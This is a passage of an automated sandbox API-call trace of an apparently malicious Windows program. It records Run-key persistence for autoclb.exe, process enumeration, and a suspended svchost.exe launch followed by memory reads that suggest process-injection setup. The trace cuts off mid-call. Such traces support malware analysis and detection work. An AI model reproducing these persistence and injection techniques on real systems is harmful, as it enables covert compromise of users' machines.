(lpString="NtAllocateLocallyUniqueId") returned 25 [0075.931] lstrlenA (lpString="NtAllocateReserveObject") returned 23 [0075.931] lstrlenA (lpString="NtAllocateUserPhysicalPages") returned 27 [0075.931] lstrlenA (lpString="NtAllocateUuids") returned 15 [0075.931] lstrlenA (lpString="NtAllocateVirtualMemory") returned 23 [0075.931] lstrlenA (lpString="NtAlpcAcceptConnectPort") returned 23 [0075.931] lstrlenA (lpString="NtAlpcCancelMessage") returned 19 [0075.931] lstrlenA (lpString="NtAlpcConnectPort") returned 17 [0075.931] lstrlenA (lpString="NtAlpcConnectPortEx") returned 19 [0075.931] lstrlenA (lpString="NtAlpcCreatePort") returned 16 [0075.931] lstrlenA (lpString="NtAlpcCreatePortSection") returned 23 [0075.931] lstrlenA (lpString="NtAlpcCreateResourceReserve") returned 27 [0075.931] lstrlenA (lpString="NtAlpcCreateSectionView") returned 23 [0075.931] lstrlenA (lpString="NtAlpcCreateSecurityContext") returned 27 [0075.931] lstrlenA (lpString="NtAlpcDeletePortSection") returned 23 [0075.931] lstrlenA (lpString="NtAlpcDeleteResourceReserve") returned 27 [0075.931] lstrlenA (lpString="NtAlpcDeleteSectionView") returned 23 [0075.931] lstrlenA (lpString="NtAlpcDeleteSecurityContext") returned 27 [0075.931] lstrlenA (lpString="NtAlpcDisconnectPort") returned 20 [0075.931] lstrlenA (lpString="NtAlpcImpersonateClientContainerOfPort") returned 38 [0075.932] lstrlenA (lpString="NtAlpcImpersonateClientOfPort") returned 29 [0075.932] lstrlenA (lpString="NtAlpcOpenSenderProcess") returned 23 [0075.932] lstrlenA (lpString="NtAlpcOpenSenderThread") returned 22 [0075.932] lstrlenA (lpString="NtAlpcQueryInformation") returned 22 [0075.932] lstrlenA (lpString="NtAlpcQueryInformationMessage") returned 29 [0075.932] lstrlenA (lpString="NtAlpcRevokeSecurityContext") returned 27 [0075.932] lstrlenA (lpString="NtAlpcSendWaitReceivePort") returned 25 [0075.932] lstrlenA (lpString="NtAlpcSetInformation") returned 20 [0075.932] lstrlenA (lpString="NtApphelpCacheControl") returned 21 [0075.932] lstrlenA (lpString="NtAreMappedFilesTheSame") returned 23 [0075.932] lstrlenA (lpString="NtAssignProcessToJobObject") returned 26 [0075.932] lstrlenA (lpString="NtAssociateWaitCompletionPacket") returned 31 [0075.932] lstrlenA (lpString="NtCallbackReturn") returned 16 [0075.932] lstrlenA (lpString="NtCancelIoFile") returned 14 [0075.932] lstrlenA (lpString="NtCancelIoFileEx") returned 16 [0075.932] lstrlenA (lpString="NtCancelSynchronousIoFile") returned 25 [0075.932] lstrlenA (lpString="NtCancelTimer") returned 13 [0075.932] lstrlenA (lpString="NtCancelTimer2") returned 14 [0075.932] lstrlenA (lpString="NtCancelWaitCompletionPacket") returned 28 [0075.932] lstrlenA (lpString="NtClearEvent") returned 12 [0075.932] lstrlenA (lpString="NtClose") returned 7 [0075.932] lstrlenA (lpString="NtCloseObjectAuditAlarm") returned 23 [0075.932] lstrlenA (lpString="NtCommitComplete") returned 16 [0075.932] lstrlenA (lpString="NtCommitEnlistment") returned 18 [0075.932] lstrlenA (lpString="NtCommitTransaction") returned 19 [0075.932] lstrlenA (lpString="NtCompactKeys") returned 13 [0075.932] lstrlenA (lpString="NtCompareObjects") returned 16 [0075.932] lstrlenA (lpString="NtCompareTokens") returned 15 [0075.932] lstrlenA (lpString="NtCompleteConnectPort") returned 21 [0075.932] lstrlenA (lpString="NtCompressKey") returned 13 [0075.955] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0075.955] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf013f, phkResult=0x5dfee4 | out: phkResult=0x5dfee4*=0x17c) returned 0x0 [0075.955] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0075.955] RegQueryValueExW (in: hKey=0x17c, lpValueName="cabilipc", lpReserved=0x0, lpType=0x5dfedc, lpData=0x2228bd0, lpcbData=0x5dfee8*=0x76 | out: lpType=0x5dfedc*=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpcbData=0x5dfee8*=0x76) returned 0x0 [0075.955] lstrcmpiW (lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0 [0075.955] RegCloseKey (hKey=0x17c) returned 0x0 [0075.955] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1 [0075.959] CreateEventA (lpEventAttributes=0x5dff1c, bManualReset=1, bInitialState=0, lpName="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 0x1d4 [0075.959] GetLastError () returned 0x0 [0075.959] CloseHandle (hObject=0x1d4) returned 1 [0075.959] RegOpenKeyExA (in: hKey=0x80000003, lpSubKey=0x0, ulOptions=0x0, samDesired=0x20119, phkResult=0x5dfed0 | out: phkResult=0x5dfed0*=0x1d8) returned 0x0 [0075.959] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x0, lpName=0x2228b50, lpcchName=0x5dfee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".DEFAULT", lpcchName=0x5dfee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0075.959] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0075.959] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x1, lpName=0x2228b50, lpcchName=0x5dfee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-19", lpcchName=0x5dfee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0075.959] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0075.959] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x2, lpName=0x2228b50, lpcchName=0x5dfee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-20", lpcchName=0x5dfee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0075.959] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0075.959] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x3, lpName=0x2228b50, lpcchName=0x5dfee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-21-1462094071-1423818996-289466292-1000", lpcchName=0x5dfee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0075.959] StrChrA (lpStart="S-1-5-21-1462094071-1423818996-289466292-1000", wMatch=0x5f) returned 0x0 [0075.959] lstrcpyA (in: lpString1=0x5dfd54, lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000") returned="S-1-5-21-1462094071-1423818996-289466292-1000" [0075.959] lstrcatA (in: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\Software\\Microsoft\\Windows\\CurrentVersion" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion") returned="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion" [0075.959] lstrcatA (in: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion", lpString2="\\Explorer\\Shell Folders" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders") returned="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" [0075.959] RegOpenKeyA (in: hKey=0x1d8, lpSubKey="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", phkResult=0x5dfe90 | out: phkResult=0x5dfe90*=0x1dc) returned 0x0 [0075.959] RegQueryValueExW (in: hKey=0x1dc, lpValueName="AppData", lpReserved=0x0, lpType=0x5dfe8c, lpData=0x0, lpcbData=0x5dfe98*=0xfffffffe | out: lpType=0x5dfe8c*=0x1, lpData=0x0, lpcbData=0x5dfe98*=0x4c) returned 0x0 [0075.959] lstrlenW (lpString="autoclb.exe") returned 11 [0075.959] RegQueryValueExW (in: hKey=0x1dc, lpValueName="AppData", lpReserved=0x0, lpType=0x5dfe8c, lpData=0x2228c60, lpcbData=0x5dfe98*=0x4c | out: lpType=0x5dfe8c*=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpcbData=0x5dfe98*=0x4c) returned 0x0 [0075.960] PathCombineW (in: pszDest=0x2228c60, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="adsldraw" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" [0075.960] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw"), lpSecurityAttributes=0x0) returned 0 [0075.960] PathCombineW (in: pszDest=0x2228c60, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw", pszFile="autoclb.exe" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" [0075.960] lstrcmpiW (lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0 [0075.960] RegCloseKey (hKey=0x1dc) returned 0x0 [0075.960] RegCloseKey (hKey=0x1d8) returned 0x0 [0075.960] StrChrW (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", wMatch=0x22) returned="\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" [0075.960] StrChrW (lpStart="\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", wMatch=0x20) returned=" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"" [0075.960] lstrlenW (lpString=" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"") returned 40 [0075.961] StrTrimW (in: psz=" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", pszTrimChars=" \x09\"" | out: psz="C:\\Users\\CIIHMN~1\\Desktop\\educat.exe") returned 1 [0075.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2193ab0, Length=0x10000, ResultLength=0x5dfee8 | out: SystemInformation=0x2193ab0, ResultLength=0x5dfee8*=0x13f70) returned 0xc0000004 [0075.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2193ab0, Length=0x13f70, ResultLength=0x5dfee8 | out: SystemInformation=0x2193ab0, ResultLength=0x5dfee8*=0xfa00) returned 0x0 [0075.998] RtlUpcaseUnicodeString (DestinationString="\xf88b\xff81\x04\xc000\xce74\x5eb\x9abf", SourceString="System", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="smss.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="csrss.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="C") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="wininit.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="W") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="csrss.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="C") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="winlogon.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="W") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="services.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="lsass.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="L") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="dwm.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="D") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.998] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.998] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="spoolsv.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="OfficeClickToRun.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="O") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="svchost.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="sihost.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="S") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="taskhostw.exe", AllocateDestinationString=1) returned 0x0 [0075.999] RtlFreeAnsiString (AnsiString="T") [0075.999] RtlUpcaseUnicodeString (DestinationString=0x5dfec8, SourceString="explorer.exe", AllocateDestinationString=1) returned 0x0 [0075.999] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77150000 [0075.999] GetProcAddress (hModule=0x77150000, lpProcName="GetWindowThreadProcessId") returned 0x7716ba70 [0075.999] FindWindowA (lpClassName="ProgMan", lpWindowName=0x0) returned 0x100c8 [0075.999] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0x5dfeb4 | out: lpdwProcessId=0x5dfeb4) returned 0x55c [0075.999] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x508) returned 0x1d8 [0075.999] IsWow64Process (in: hProcess=0x1d8, Wow64Process=0x5dfe80 | out: Wow64Process=0x5dfe80) returned 1 [0076.000] CloseHandle (hObject=0x1d8) returned 1 [0076.000] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\svchost.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x21 [0076.000] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\svchost.exe", lpDst=0x2228ae8, nSize=0x21 | out: lpDst="C:\\Windows\\system32\\svchost.exe") returned 0x20 [0076.000] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0076.000] GetProcAddress (hModule=0x75260000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x7529b6a0 [0076.000] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0076.000] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x5dfe58*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5dfea0 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0x5dfea0*(hProcess=0x1dc, hThread=0x1d8, dwProcessId=0xfd8, dwThreadId=0xfdc)) returned 1 [0076.254] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0076.254] IsWow64Process (in: hProcess=0x1dc, Wow64Process=0x5dfb38 | out: Wow64Process=0x5dfb38) returned 1 [0076.254] RtlGetVersion (in: lpVersionInformation=0x5df518 | out: lpVersionInformation=0x5df518*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0076.254] GetCurrentProcessId () returned 0xfb8 [0076.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfb8) returned 0x1e4 [0076.254] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.255] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.255] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.255] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.255] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64ReadVirtualMemory64") returned 0x77d0a860 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7ffdf000, Buffer=0x0, BufferSize=0x21a7c30, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee4c61c0, Buffer=0x7ff8, BufferSize=0x21a7c58, NumberOfBytesRead=0x40 | out: Buffer=0x7ff8, NumberOfBytesRead=0x40) returned 0x0 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x221d90, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x221c10, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x222230, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x222510, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2226e0, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.255] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0076.255] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.256] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.256] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7ffdf000, Buffer=0x0, BufferSize=0x21a7c30, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee4c61c0, Buffer=0x7ff8, BufferSize=0x21a7c58, NumberOfBytesRead=0x40 | out: Buffer=0x7ff8, NumberOfBytesRead=0x40) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x221d90, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x221948, Buffer=0x0, BufferSize=0x21a7a28, NumberOfBytesRead=0x6c | out: Buffer=0x0, NumberOfBytesRead=0x6c) returned 0x0 [0076.256] StrRChrA (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x221c10, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x221b10, Buffer=0x0, BufferSize=0x21a7a28, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0076.256] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x222230, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2223b0, Buffer=0x0, BufferSize=0x21a7a28, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0076.256] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x222510, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x222690, Buffer=0x0, BufferSize=0x21a7a28, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0076.256] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2226e0, Buffer=0x0, BufferSize=0x21a7c98, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0076.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x2221b0, Buffer=0x0, BufferSize=0x21a7a28, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0076.256] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0076.257] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0076.257] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0076.257] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0076.257] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0076.257] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.257] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0076.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x2580000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x2581000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x2582000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x2583000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x2584000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x2585000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x2586000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x2587000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x2588000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x2589000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x258a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x258b000, 